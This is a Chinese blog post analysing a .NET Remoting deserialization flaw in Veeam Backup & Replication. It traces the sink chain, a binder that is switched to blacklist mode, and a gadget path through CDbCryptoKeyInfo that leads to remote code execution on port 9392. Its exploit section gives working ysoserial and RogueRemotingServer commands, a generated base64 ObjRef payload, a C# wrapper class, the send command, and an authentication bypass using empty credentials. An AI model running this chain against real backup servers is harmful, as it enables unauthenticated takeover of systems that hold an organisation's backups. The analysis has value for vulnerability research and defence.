代码逻辑分析

原创 于 2024-12-31 06:00:00 发布 · 1.2k 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#逻辑漏洞

Remoting代码逻辑分析
按照之前的思路:

注册的Channel类型(全局搜ChannelServices#RegisterChannelInternal)
sinkProviderChains
TypeFilterLevel
注册的objecturi(全局搜RemotingConfiguration#RegisterWellKnownServiceType或RemotingServices#Marshal)
处理消息逻辑(IServerChannelSink#ProcessMessage的实现)
首先定位到Veeam.Common.Remoting.dll文件发现有TransportSink和FormatterSink相关的类,但是并没有自定义的ServerChannel,搜索ChannelServices#RegisterChannelInternal的调用找到注册ServerChannel的地方:在这里插入图片描述
挨个看过去只有CSrvTcpChannelRegistration类注册了一个tcpServerChannel,具体调用代码如下:

private static TcpServerChannel RegisterChannel(Dictionary<string, string> channelProperties, IServerChannelSinkProvider sinkProvider, CConnectionInterceptor connectionInterceptor)
{
TcpServerChannel tcpServerChannel = new TcpServerChannel(channelProperties, sinkProvider, connectionInterceptor);
// 开启认证
tcpServerChannel.IsSecured = true;
ChannelServices.RegisterChannel(tcpServerChannel, true);
CSrvTcpChannelRegistration.LogChannelData(tcpServerChannel);
return tcpServerChannel;
}
注意这里TcpServerChannel传入的有第三个参数CConnectionInterceptor,这里放到后面再说,我们先梳理sinkProviderChains。
继续查找调用寻找sinkProvider定义的地方:

//其构造函数
private CSrvTcpChannelRegistration(string commonChannelName, int port, IReadOnlyDictionary<string, string> channelProperties, bool enableRemotingPerfLog, bool requireBasicPermission, [CanBeNull] IActivityMonitor monitor, [CanBeNull] IImpersonationProvider impersonation, [CanBeNull] IAccessCheckProvider accessCheckerProvider, [CanBeNull] IMfaProvider mfaProvider)
{
this._commonChannelName = commonChannelName;
this._port = port;
//调用GetSinkProvider方法
IServerChannelSinkProvider sinkProvider = CSrvTcpChannelRegistration.GetSinkProvider(enableRemotingPerfLog, requireBasicPermission, monitor, impersonation, accessCheckerProvider, mfaProvider);
CConnectionInterceptor cconnectionInterceptor = new CConnectionInterceptor();
if (Socket.OSSupportsIPv4)
{
TcpServerChannel tcpServerChannel = CSrvTcpChannelRegistration.RegisterChannel(CSrvTcpChannelRegistration.CreateIPv4BindingConfiguration(commonChannelName, channelProperties), sinkProvider, cconnectionInterceptor);
this._channelIPv4Name = tcpServerChannel.ChannelName;
}

}
跟进GetSinkProvider方法

private static IServerChannelSinkProvider GetSinkProvider(bool enableRemotingPerfLog, bool requireBasicPermission, [CanBeNull] IActivityMonitor monitor, [CanBeNull] IImpersonationProvider impersonation, [CanBeNull] IAccessCheckProvider accessCheckerProvider, [CanBeNull] IMfaProvider mfaProvider)
{
IServerChannelSinkProvider serverChannelSinkProvider = new CBinaryServerFormatterSinkProvider(enableRemotingPerfLog, requireBasicPermission, accessCheckerProvider, mfaProvider);
if (monitor != null)
{
serverChannelSinkProvider = new CActivityMonitorServerSinkProvider(monitor, serverChannelSinkProvider);
}
if (impersonation != null)
{
serverChannelSinkProvider = new CImpersonationServerSinkProvider(impersonation, serverChannelSinkProvider);
}
return serverChannelSinkProvider;
}
这里使用的是CBinaryServerFormatterSink作为FormatterSink,TransportSink使用的默认TcpServerTransportSink,整个服务端的sinkProviderChains:TcpServerTransportSink → CBinaryServerFormatterSink → DispatchChannelSink
同时CBinaryServerFormatterSink中定义了TypeFilterLevel.Low

追溯到启动类发现监听的端口为9392,服务名为Veeam.Backup.Service.exe(tcp://IP:9392/VeeamClientUpdateService )。

最后找到对应的ProcessMessage方法梳理处理消息的逻辑,主要代码如下:

public ServerProcessing ProcessMessage(IServerChannelSinkStack sinkStack, IMessage requestMsg, ITransportHeaders requestHeaders, Stream requestStream, out IMessage responseMsg, out ITransportHeaders responseHeaders, out Stream responseStream)
{
ServerProcessing serverProcessing;
using (LogRegistration.RegisterSafe(this._logStorage))
{

string text = (string)requestHeaders[“Content-Type”];
string text2 = (string)requestHeaders[“__RequestVerb”];

//部分省略
requestMsg = CBinaryServerFormatterSink.DeserializeBinaryRequestMessage(requestStream, requestHeaders);
if (requestMsg == null)
{
throw new RemotingException(“Remoting Deserialize Error”);
}
IMethodMessage methodMessage = requestMsg as IMethodMessage;
if (methodMessage != null)
{
string text3 = requestHeaders[“access_token”] as string;
Dictionary<string, object> dictionary;
EJwtValidationResult ejwtValidationResult = this._mfaProvider.ValidateToken(text3, out dictionary);
if (ejwtValidationResult == EJwtValidationResult.Empty || ejwtValidationResult == EJwtValidationResult.Invalid)
{
this.EnsureMfa(requestHeaders);
}
this.EnsureAccessIsAllowed(methodMessage);
}
sinkStack.Push(this, null);
ServerProcessing serverProcessing2 = this.CallNextSink(sinkStack, requestMsg, requestHeaders, null, out responseMsg, out responseHeaders, out responseStream);
if (responseStream != null)
{
throw new RemotingException(“Remoting_ChnlSink_WantNullResponseStream”);
}
switch (serverProcessing2)
{
case ServerProcessing.Complete:
if (responseMsg == null)
{
throw new RemotingException(“Remoting_DispatchMessage”);
}
sinkStack.Pop(this);
this.AddSessionToken(requestHeaders, ref responseHeaders);
CBinaryServerFormatterSink.SerializeResponse(sinkStack, responseMsg, ref responseHeaders, out responseStream);
this.AdditionalyLogResponse(responseMsg);

}
}
}
return serverProcessing;
}
调用DeserializeBinaryRequestMessage方法执行反序列化的操作,也是整个过程中最关键的,实现如下

//Veeam.Common.Remoting.CBinaryServerFormatterSink#DeserializeBinaryRequestMessage
private static IMessage DeserializeBinaryRequestMessage(Stream requestStream, ITransportHeaders requestHeaders)
{
IMessage message;
try
{
message = (IMessage)CBinaryServerFormatterSink.CreateFormatter(false).DeserializeMethodResponse(requestStream, new HeaderHandler(new CBinaryServerFormatterSink.UriHeaderHandler(requestHeaders).HeaderHandler), null);
}
finally
{
requestStream.Close();
}
return message;
}

//Veeam.Common.Remoting.CBinaryServerFormatterSink#CreateFormatter
private static BinaryFormatter CreateFormatter(bool serializingResponse)
{
BinaryFormatter binaryFormatter = new BinaryFormatter();
binaryFormatter.Binder = new RestrictedSerializationBinder(serializingResponse, RestrictedSerializationBinder.Modes.FilterByWhitelist);
binaryFormatter.Context = new StreamingContext(StreamingContextStates.Other);
binaryFormatter.FilterLevel = TypeFilterLevel.Low;
binaryFormatter.AssemblyFormat = FormatterAssemblyStyle.Full;
if (!serializingResponse)
{
binaryFormatter.SurrogateSelector = new CDataSerializationSurogate();
}
else
{
ISurrogateSelector surrogateSelector = new RemotingSurrogateSelector();
surrogateSelector.ChainSelector(new CDataSerializationSurogate());
binaryFormatter.SurrogateSelector = surrogateSelector;
}
return binaryFormatter;
}
这儿有两点需要注意:

定义了RestrictedSerializationBinder设置反序列化白名单或黑名单
定义了CDataSerializationSurogate作为formatter的序列化或反序列化处理
首先看RestrictedSerializationBinder是如何防御的,关注ResolveType方法和BindToType方法,如果仅仅使用CustomSerializationBinder是可以绕的,数据流:CustomSerializationBinder#BindToType–>RestrictedSerializationBinder#ResolveType–>RestrictedSerializationBinder#EnsureTypeIsAllowed关键代码如下:

// Veeam.Backup.Common.CustomSerializationBinder
public class CustomSerializationBinder : SerializationBinder
{
public override Type BindToType(string assemblyName, string typeName)
{
return CustomSerializationBinder.TypeCache.GetOrAdd(new ValueTuple<string, string>(assemblyName, typeName), new Func<ValueTuple<string, string>, Type>(this.ResolveType));
}

    protected virtual Type ResolveType([TupleElementNames(new string[] { "assemblyName", "typeName" })] ValueTuple<string, string> key)
    {
        return SBinderHelper.ResolveType(key);
    }

// Veeam.Backup.Common.RestrictedSerializationBinder
public sealed class RestrictedSerializationBinder : CustomSerializationBinder
{
public RestrictedSerializationBinder(bool serializingResponse, RestrictedSerializationBinder.Modes mode = RestrictedSerializationBinder.Modes.FilterByWhitelist)
{
this._serializingResponse = serializingResponse;
this._mode = mode;
}

protected override Type ResolveType([TupleElementNames(new string[] { “assemblyName”, “typeName” })] ValueTuple<string, string> key)
{
this.EnsureTypeIsAllowed(key);
Type type = base.ResolveType(key);
RestrictedSerializationBinder.CheckIsRestrictedType(type);
return type;
}

    private void EnsureTypeIsAllowed([TupleElementNames(new string[] { "assemblyName", "typeName" })] ValueTuple<string, string> key)
    {
        if (!this._serializingResponse && SOptions.Instance.ShouldWhitelistingRemoting)
        {
            this.EnsuredBlackWhitelistsAreLoaded();
            string text = key.Item2 + ", " + key.Item1;
            if (this._mode == RestrictedSerializationBinder.Modes.FilterByWhitelist)
            {
                RestrictedSerializationBinder._allowedTypeFullnames.EnsureIsAllowed(text);
                return;
            }
            if (this._mode == RestrictedSerializationBinder.Modes.FilterByBlacklist)
            {
                RestrictedSerializationBinder._notAllowedTypeFullnames.EnsureIsAllowed(text);
            }
        }
    }

RestrictedSerializationBinder根据传入的mode参数决定使用白名单或黑名单模式,整个Remoting处理用的是白名单模式,这儿并不是先白名单后黑名单校验,而是二选一于是有了可乘之机。

漏洞分析
一共五处调用最终找到一处调用使用的是黑名单模式
在这里插入图片描述
代码如下:

// Veeam.Backup.Core.CProxyBinaryFormatter#Deserialize
public static T Deserialize(string input)
{
T t;
try
{
byte[] array = Convert.FromBase64String(input);
BinaryFormatter binaryFormatter = new BinaryFormatter
{
Binder = new RestrictedSerializationBinder(false, RestrictedSerializationBinder.Modes.FilterByBlacklist)
};
t = CProxyBinaryFormatter.BinaryDeserializeObject(array, binaryFormatter);
}
妥妥的反序列化,老外通过对比补丁新增了一个ObjRef的链,该链子在反序列化的过程中只会反序列化System.Runtime.Remoting.ObjRef和System.Exception,执行命令时不会触发其他黑名单。

可以将Veeam.Backup.Core.CProxyBinaryFormatter#Deserialize作为一个跳板,找到一处调用该方法并处于白名单中的类,就能实现RCE。刚好最后老外从白名单找到一个调用该方法的类

// Veeam.Backup.Model.CDbCryptoKeyInfo
private readonly List _repairRecs = new List();
protected CDbCryptoKeyInfo(SerializationInfo info, StreamingContext context)
{
this.Id = (Guid)info.GetValue(“Id”, typeof(Guid));
byte[] array = (byte[])info.GetValue(“KeySetId”, typeof(byte[]));
this.KeySetId = new CKeySetId(array);
this.KeyType = (EDbCryptoKeyType)((int)info.GetValue(“KeyType”, typeof(int)));
this.EncryptedKeyValue = Convert.FromBase64String(info.GetString(“DecryptedKeyValue”));
this.Hint = info.GetString(“Hint”);
this.ModificationDateUtc = info.GetDateTime(“ModificationDateUtc”).SpecifyDateTimeUtc();
this.CryptoAlg = (ECryptoAlg)info.GetInt32(“CryptoAlg”);
this._repairRecs = CProxyBinaryFormatter.Deserialize((string[])info.GetValue(“RepairRecs”, typeof(string[]))).ToList();
this.Version = info.GetInt64(“Version”);
this.BackupId = (Guid)info.GetValue(“BackupId”, typeof(Guid));
this.IsImported = info.GetBoolean(“IsImported”);
}
总结下:

无需自定义Channel(TcpServerChannel)
开启了认证(CConnectionInterceptor)、low type filter
存在一个URI为tcp://IP:9392/VeeamClientUpdateService
整个利用链.Net Remoting --> CDbCryptoKeyInfo( 白名单 ) --> CProxyBinaryFormatter.Deserialize ( 黑名单objref )–> RCE
EXP构造
需要用到ExploitRemotingService,有点小改动我编译之后放到这儿了。这儿的改动其实就是绕过其认证的,将用户密码置空就能绕过,CConnectionInterceptor类实际上未处理只是返回true。在这里插入图片描述
然后构造ObjRef

ysoserial.exe -f SoapFormatter -g TextFormattingRunProperties -o raw -c calc > exploit.soapformatter

RogueRemotingServer.exe --wrapSoapPayload http://0.0.0.0:2345/aaa exploit.soapformatter

ysoserial.exe -g ObjRef -f BinaryFormatter -c http://10.106.24.105:2345/aaa

// 最终生成AAEAAAD/////AQAAAAAAAAAEAQAAABBTeXN0ZW0uRXhjZXB0aW9uAQAAAAlDbGFzc05hbWUDHlN5c3RlbS5SdW50aW1lLlJlbW90aW5nLk9ialJlZgkCAAAABAIAAAAeU3lzdGVtLlJ1bnRpbWUuUmVtb3RpbmcuT2JqUmVmAQAAAAN1cmwBBgMAAAAdaHR0cDovLzEwLjEwNi4yNC4xMDU6MjM0NS9hYWEL
重定义CDbCryptoKeyInfo序列化过程,传入上面生成的poc序列化:

[Serializable]
public class CDbCryptoKeyInfoWrapper : ISerializable
{
private string[] _fakeList;

public CDbCryptoKeyInfoWrapper(string[] _fakeList)  
{  
    this._fakeList = _fakeList;  
}  

public void GetObjectData(SerializationInfo info, StreamingContext context)  
{  
    info.SetType(typeof(CDbCryptoKeyInfo));  
    info.AddValue("Id", Guid.NewGuid());  
    info.AddValue("KeySetId", null);  
    info.AddValue("KeyType", 1);  
    info.AddValue("Hint", "aaaaa");  
    info.AddValue("DecryptedKeyValue", "AAAA");  
    info.AddValue("LocaleLCID", 0x409);  
    info.AddValue("ModificationDateUtc", new DateTime());  
    info.AddValue("CryptoAlg", 1);  
    info.AddValue("RepairRecs", _fakeList);  
}

}
传入生成的CDbCryptoKeyInfo序列化数据,再通过ExploitRemotingService发送POC

ExploitRemotingService.exe -s tcp://192.168.45.144:9392/VeeamClientUpdateService raw AAEAAAD/////AQAAAAAAA
在这里插入图片描述
总结
当TypeFilterLevel.Low时,可以尝试反序列化其他符合条件的对象进而触发一些恶意方法实现RCE。

karbor 中定时备份代码逻辑分析
可乐的博客
05-21 607
karbor 是openstack中的数据保护项目。对于数据备份最重要的当然是备份,其次重要的就是可以设置定时和周期进行备份。karbor进行周期备份主要按以下步骤进行:创建一个plan------指名要保护的对象和使用的provider创建一个triger------一个时间相关的触发器,定义了从什么时候开始备份,以及备份的时间间隔执行schedule operation------就是用上面的...
基于STM32与PulseView的逻辑分析仪项目代码
最新发布
08-31
本项目涉及的是一套基于STM32微控制器和PulseView软件开发的逻辑分析仪系统。该逻辑分析仪的核心是正点原子开发板搭载的STM32系列MCU。系统被设计用于对数字信号进行深入的捕捉和分析,以帮助工程师和爱好者在硬件...
Codex:剖析代码分析逻辑,发现缺陷
02-01
Codex-剖析代码分析逻辑,发现缺陷 codEX项目的目标是开发系统的策略和方法,以进行(半)自动化源代码分析。 基本思想是创建一个能够剖析源代码的框架。 为了在逻辑层上进行进一步分析,需要减少归一化。 这是通过针对不同编程语言的虚拟编译器实现的,该虚拟编译器创建了一个名为MetaCode:trade_mark:的类似于线性程序集的结构。 根据此中间代码,可以使用高级命题演算对解剖后的程序进行形式化分析。 可以非常准确地确定语法错误(例如,括号不足),逻辑错误(例如,不合一的计数器)和安全缺陷(例如,SQL注入)。 因此,利用codEX可以很容易地找到应用程序中的漏洞
逻辑分析仪源代码程序
11-25
逻辑分析仪源代码在VC6,VC7下可编译通过
代码逻辑分析_代码分析平台CodeQL学习手记(二)
weixin_39946327的博客
11-21 444
上一篇文章:代码分析平台CodeQL入门(一)在上一篇文章中,我们为读者介绍了CodeQL平台相关的基本概念,并演示了如何编写和运行简单的QL程序。在本文中,我们开始为读者介绍一些简单的数据类型,以便为将来的编程工作打好基础。 基本数据类型及其内建函数现在,我们开始学习QL语言中的基本数据类型,包括整型、浮点型、日期型、布尔型以及字符串类型。需要注意的是,对于QL语言来说,其支持的数据类...
代码逻辑
weixin_38410551的博客
06-13 5287
代码逻辑要尽量简洁,符合处理问题的逻辑。 开始写函数时,就要考虑清楚函数需要解决的问题,函数的输入输出。而且函数模块的可复用性要高。
精选资源
lg.rar_fpga逻辑分析仪_波形分析_逻辑分析_逻辑分析
09-19
VHDL代码会详细说明如何配置FPGA来实现逻辑分析仪的功能,包括信号采集、触发、存储和显示等部分。 在这个项目中,开发者可能使用了FPGA的内部RAM来暂存波形数据,然后通过并行接口将数据传输到显示设备进行实时...
FPGA+CY7C68013A+delphi7逻辑分析仪开源项目全套源码
11-08
本开源项目围绕FPGA(Field-Programmable Gate Array,现场可编程门阵列)、CY7C68013A USB控制器以及Delphi7编程环境构建了一个逻辑分析仪。这个项目的目的是为用户提供一个自定义的、低成本的硬件工具,用于分析...
saleae 逻辑分析仪软件V1.1.15
02-21
在实际应用中,Saleae逻辑分析仪软件V1.1.15版本可以用于各种场景,如硬件设计验证、故障排查、代码调试等。例如,在硬件设计阶段,可以检测信号完整性,确保通信接口的正确性;在产品开发中,如果遇到通信问题,...
精选资源
基于FPGA的简易逻辑分析仪设计
04-16
并以AT89S52单片机和现场可编程门阵列(FPGA)组成的最小系统为核心,采用数字信号发生器模块、由模拟开关和A/D采样组成的信号并行采集电路、触发模块、数据储存模块和显示电路等构成简易逻辑分析仪。该分析仪的功能...
简单的逻辑分析
06-10
生成csv文件用execl图表看时序,由于具体串口不知,使用时,把stdax.h里的DEBUG宏关掉
代码逻辑分析_双 11 模块 79.34% 的代码是怎样智能生成的?
weixin_39629947的博客
11-22 221
作为今年阿里经济体前端委员会的四大技术方向之一,前端智能化方向一被提及,就不免有人好奇:前端结合 AI 能做些什么,怎么做,未来会不会对前端产生很大的冲击等等。本篇文章将围绕这些问题,以「设计稿自动生成代码」场景为例,从背景分析、竞品分析、问题拆解、技术方案等几个角度切入,细述相关思考及过程实践。背景分析业界机器学习之势如火如荼,「AI 是未来的共识」频频出现在各大媒体上。李开复老师也在...
独家下载!阿里如何用 AI 写代码
睡前人工智能共享实验室
02-20 636
作为今年阿里经济体前端委员会的四大技术方向之一,前端智能化方向一被提及,就不免有人好奇:前端结合 AI 能做些什么,怎么做,未来会不会对前端产生很大的冲击等等。本篇文章将围绕这些问题,以「设计稿自动生成代码」场景为例,从背景分析、竞品分析、问题拆解、技术方案等几个角度切入,细述相关思考及过程实践。 背景分析 业界机器学习之势如火如荼,「AI 是未来的共识」频频出现在各大媒体上。简单的...
代码逻辑分析_入行数据分析师不得不看的10本书
weixin_39792519的博客
11-21 212
随着市场上数据分析师岗位需求越来越多,入行数据分析师的人日益增多,而入行数据分析的门槛也越来越高。今天就来盘点入行数据分析师必看的10本书。能否顺利入行数据分析师,主要看技能是否达标以及分析思维是否有逻辑,下面就从数据分析师的职业技能(Excel、Sql、Python)与分析思维两方面来介绍:一、职业技能方面:1.Excel/Office:书籍名称:《和秋叶一起学Word Excel PPT》书籍...
编程思路整理---逻辑
jllws1的博客
10-25 4854
编程逻辑
在写代码的时候,如何快速理清逻辑
cnzzs的博客
11-20 2207
代码逻辑与编程质量清晰的代码逻辑是构建高质量软件的基础。它不仅能 显著提升代码的可读性和可维护性 ,还能有效 降低后期的维护成本 。良好的代码逻辑通常采用“分而治之”的策略,将复杂功能拆分为独立的小单元,每个单元专注于单一职责。这种方法不仅降低了整体复杂度,还提高了代码的复用性。此外,通过合理运用模块化设计和封装技术,开发...
一文看懂程序底层实现逻辑(一)
qq_65786321的博客
04-12 2845
1.翻译环境,在这个环境中源代码被转换为可执行的机器指令 2.执行环境,它用于实际执行代码 ​ ​ 组成一个程序的每个源文件通过编译过程分别转换成目标代码(object code) 每个目标文件由链接器(linker)捆绑在一起,形成一个单一而完整的可执行程序 ​ ​ 1. 预处理 选项 gcc -E test.c -o test.i 预处理完成之后就停下来,预处理之后产生的结果都放在test.i文件中 2. 编译 选项 gcc -S test.c 编译完成之后就停下来,结果保存在test.s中
代码逻辑分析_11个代码质量审核和管理工具,程序员必备!
weixin_39703468的博客
11-23 1786
如今,代码质量分析和审核已成为每个企业的基本流程。随着开源代码库使用的增加,安全性和代码质量对于构建高质量软件至关重要。不良的代码不仅会影响代码的可维护性,而且还会在某些情况下影响其性能。此外,更好的代码质量还有助于企业将来减少维护和降低成本。幸运的是,有很多审核和管理代码的工具,为开发者和程序员提供了发现代码问题的解决方案。1.SonarQubeSonarQube是市场上最受欢迎的代码质量和安全...
C#序列化与反序列化方式简单总结
weixin_33720078的博客
03-21 349
序列化和反序列化 相关类: System.SerializableAttribute特性(或称为属性), System.Runtime.Serialization.ISerializable(自定义序列化接口) https://msdn.microsoft.com/zh-cn/library/system.runtime.serialization.iserializable.aspx, ...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值